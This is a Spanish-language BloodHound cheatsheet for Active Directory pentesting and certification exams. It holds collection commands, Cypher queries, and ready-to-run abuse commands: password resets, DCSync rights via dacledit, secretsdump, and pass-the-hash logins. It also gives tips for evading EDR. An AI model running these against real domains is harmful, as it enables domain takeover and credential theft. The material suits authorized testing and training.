# Recolección (SharpHound / bloodhound-python)
Primero, recolecta los datos del dominio. Usa SharpHound desde Windows o bloodhound-python desde Linux con credenciales válidas.
SharpHound (Windows)
.\SharpHound.exe -c All --zipfilename corp
.\SharpHound.exe -c DCOnly --Jitter 30 --Throttle 1000
bloodhound-python (Linux / Kali)
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP --zip
bloodhound-python -d domain.local -u USER --hashes :NTLM_HASH -c All -ns DC_IP --zip
nxc ldap DC_IP -u USER -p PASS --bloodhound -c All --dns-server DC_IP
# Setup e Ingesta
BloodHound CE corre en Docker con una UI web. Importa el ZIP recolectado y luego marca tus cuentas comprometidas como Owned.
curl -L https://ghst.ly/getbhce | docker compose -f - up
# Clic derecho en tu usuario/equipo comprometido → Mark as Owned
# Consultas Cypher
Cypher es el lenguaje de consulta del grafo detrás de BloodHound. Estas consultas destacan al instante los objetivos de mayor valor.
MATCH (u:User {hasspn:true}) RETURN u
MATCH (u:User {dontreqpreauth:true}) RETURN u
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
MATCH (u:User)-[:MemberOf*1..]->(g:Group)-[:DCSync|GetChanges|GetChangesAll]->(:Domain) RETURN u
MATCH p=(u {owned:true})-[:GenericAll|WriteDacl|WriteOwner|ForceChangePassword*1..]->(t) RETURN p
# Edges y cómo abusar de ellos
Cada edge es un derecho abusable. Estos son los que más explotarás en engagements y exámenes.
ForceChangePassword → net rpc password "TARGET" "NewPass1!" -U "DOMAIN"/"USER"%"PASS" -S DC
GenericAll (sobre user) → targetedKerberoast.py -d domain.local -u USER -p PASS
AddMember → net rpc group addmem "TARGET GROUP" "YOURUSER" -U ... -S DC
WriteDacl → dacledit.py -action write -rights DCSync -principal USER -target-dn "DC=domain,DC=local"
# Rutas de ataque hacia Domain Admin
Convierte el grafo en acción. Usa las consultas de análisis prediseñadas y luego ejecuta cada edge de la ruta.
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-secretsdump domain.local/USER:PASS@DC_IP
evil-winrm -i TARGET -u USER -H NTLM_HASH
# Consejos Pro
Saca más partido a BloodHound en engagements reales y en exámenes de AD.
-c DCOnly y omite la recolección de sesiones para no alertar al EDR.❓ Preguntas frecuentes BloodHound
BloodHound mapea las relaciones de Active Directory como un grafo y revela las rutas de ataque hacia Domain Admin. Recolecta usuarios, grupos, sesiones, ACL y trusts con un recolector (SharpHound o bloodhound-python), y luego permite ejecutar consultas Cypher y análisis de ruta más corta para encontrar cadenas de escalada invisibles a la revisión manual.
SharpHound es el recolector C#/.NET ejecutado desde un host Windows. bloodhound-python corre de forma remota desde Linux/Kali con credenciales válidas — ideal sin ejecución en una máquina Windows. Ambos generan JSON que importas en BloodHound.
Los edges son relaciones dirigidas que representan derechos abusables — por ejemplo MemberOf, AdminTo, HasSession, GenericAll, WriteDacl, ForceChangePassword y DCSync. Cada edge es un paso de una ruta de ataque; el panel Help explica cómo abusar de cada uno.
Usa la consulta prediseñada «Shortest Paths to Domain Admins», o marca tu principal Owned y ejecuta «Shortest Paths from Owned Principals». O escribe Cypher: MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p.
BloodHound CE es la reescritura actual de SpecterOps en Docker con una UI web y backend PostgreSQL/Neo4j, reemplazando la antigua app Electron. Los recolectores y conceptos Cypher son los mismos; CE mejora la escalabilidad, la API y la experiencia de consultas.
Puede serlo. SharpHound con -c All es ruidoso — LDAP masivo, enumeración de sesiones y SMB activan el EDR. Para sigilo, recolecta solo lo necesario (-c DCOnly), regula con --Jitter/--Throttle, y evita la recolección de sesiones en redes monitorizadas.
Ruta más corta a los Domain Admins, usuarios Kerberoastables (hasspn:true), AS-REP roastables (dontreqpreauth:true), principals con derechos DCSync, principals con GenericAll/WriteDacl sobre objetivos de alto valor, y equipos donde un usuario comprometido tiene una sesión activa.
En los tres exámenes muy orientados a AD, BloodHound se usa justo tras el punto de entrada para mapear el dominio y planificar la ruta hacia Domain Admin. Destaca los objetivos de Kerberoasting, las cadenas de abuso de ACL y el movimiento lateral, convirtiendo un dominio grande en un plan de ataque claro y priorizado.
SharpHound produce un ZIP de archivos JSON. En BloodHound CE, usa Administración → File Ingest; en el BloodHound antiguo, arrastra el ZIP a la UI o usa Upload Data. Tras la ingesta, ejecuta consultas prediseñadas o marca tus principals comprometidos como Owned.
Sí. El mapa mental gratuito organiza 12.020+ comandos, incluyendo la recolección de BloodHound, las consultas Cypher y toda la cadena de ataque de AD (Kerberoasting, abuso de ACL, DCSync) con búsqueda instantánea, para encontrar rápido el comando y la consulta exactos en un engagement o en la preparación de un examen.
📚 Recursos relacionados
- Cheatsheet Active Directory — Toda la cadena de ataque de AD que BloodHound mapea
- Cheatsheet CPTS — Examen empresarial de HTB — BloodHound es central
- Cheatsheet PNPT — Examen AD de TCM — ruta a Domain Admin con BloodHound
- Cheatsheet OSCP — El set de AD de la OSCP+ — Kerberoasting a Domain Admin
- Cheatsheet Hashcat — Crackea los hashes Kerberoast/AS-REP que encuentra BloodHound
- Cheatsheet Pentesting completa — 200+ comandos para web, red y Active Directory
Domina Active Directory con 12.020+ comandos
Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías — incluida toda la cadena de ataque de BloodHound y Active Directory — con búsqueda instantánea.
Empezar gratis →